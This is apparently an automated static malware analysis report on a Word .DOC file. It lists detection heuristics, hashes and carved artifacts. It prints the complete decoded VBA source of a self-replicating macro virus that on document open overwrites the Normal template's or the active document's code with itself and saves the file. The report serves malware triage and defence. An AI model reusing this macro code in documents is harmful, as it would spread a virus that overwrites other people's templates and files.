Malicious Office (OLE) / .DOC — malware analysis report

Static analysis result for SHA-256 1cb2d9993e1ef4bc…

MALICIOUS

Office (OLE) / .DOC

1.46 MB Created: 2022-05-10 06:50:00 Authoring application: Microsoft Office Word First seen: 2026-06-27
MD5: 16194c76bcd1fa698baa6b1537412571 SHA-1: b06a03dd8dc7589f9d93805b8bbc336c33f41f19 SHA-256: 1cb2d9993e1ef4bcfc9cfee8d1c1515c1a2f71b32a973d2cf213b5d4851102a1
250 Risk Score

Heuristics 8

  • Equation Editor OLE object high CVE related OLE_EQUATION_EDITOR
    Contains Equation Editor object — related to CVE-2017-11882 / CVE-2018-0802 exploitation, but CLSID presence alone is not the malformed MTEF exploit primitive.
  • ClamAV: Doc.Macro.MicroVirus-6097260-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Macro.MicroVirus-6097260-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
            .DeleteLines 1, .CountOfLines
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Sub Document_Open()
  • Heap-spray pattern detected high SC_HEAP_SPRAY
    Repeated 0x04 bytes found
    Disassembly hidden — these bytes score as degenerate, not coherent x86 code (single mnemonic 'add' is 100% of instructions — a sled or padding/filler run, not program logic).
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 4

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1668 bytes
SHA-256: 23c05dfe1843063484b69ac83a3c05ea521b15b6090dfe4b78d733dc465a3849
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'Micro-Virus
Sub Document_Open()
On Error Resume Next
Application.DisplayStatusBar = False
'MsgBox "DisplayStatusBar = False"

Options.SaveNormalPrompt = False


Ourcode = ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 100)
'MsgBox "Ourcode"

'get normal
Set Host = NormalTemplate.VBProject.VBComponents(1).CodeModule


'if normal, set active;
If ThisDocument = NormalTemplate Then
'    MsgBox "ThisDocument = NormalTemplate"
    
    Set Host = ActiveDocument.VBProject.VBComponents(1).CodeModule
'    MsgBox "Set Host = ActiveDocument"
End If

With Host
    If .Lines(1, 1) <> "'Micro-Virus" Then
    
        .DeleteLines 1, .CountOfLines
  '      MsgBox "DeleteLines 1, .CountOfLines"
        
        .InsertLines 1, Ourcode
        
        .ReplaceLine 2, "Sub Document_Close()"
    '    MsgBox "ReplaceLine 2,Close()"
       
         If ThisDocument = NormalTemplate Then
     '        MsgBox "ThisDocument = NormalTemplate"
             
             .ReplaceLine 2, "Sub Document_Open()"
      '       MsgBox "ReplaceLine 2,Open()"
             
              ActiveDocument.SaveAs ActiveDocument.FullName
       '     MsgBox "ActiveDocument.SaveAs"
            
         End If
    End If
End With
End Sub
ole10native_00.bin ole-package OLE Ole10Native stream: ObjectPool/_1276945058/Ole10Native 60100 bytes
SHA-256: 1adf40e12c3844e3a36ff71afedc2bbac54c1988259d4245284d5c2197cc49ed
ole10native_01.bin ole-package OLE Ole10Native stream: ObjectPool/_1276945302/Ole10Native 53124 bytes
SHA-256: bd76a1a1c1647f7ef463eca66dfcf8d4e08bde63ad4464f5846ee5479792d7c2
ole10native_02.bin ole-package OLE Ole10Native stream: ObjectPool/_1276945901/Ole10Native 54436 bytes
SHA-256: 309869a0b7566095c8fa9a74bb0510a5a9a094a3d027db3dbd4a12a51c99e988
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Static shellcode analysis found candidate code region(s). Indicators: heap spray 0x04

Open this report in the interactive analyzer, or submit your own file for analysis.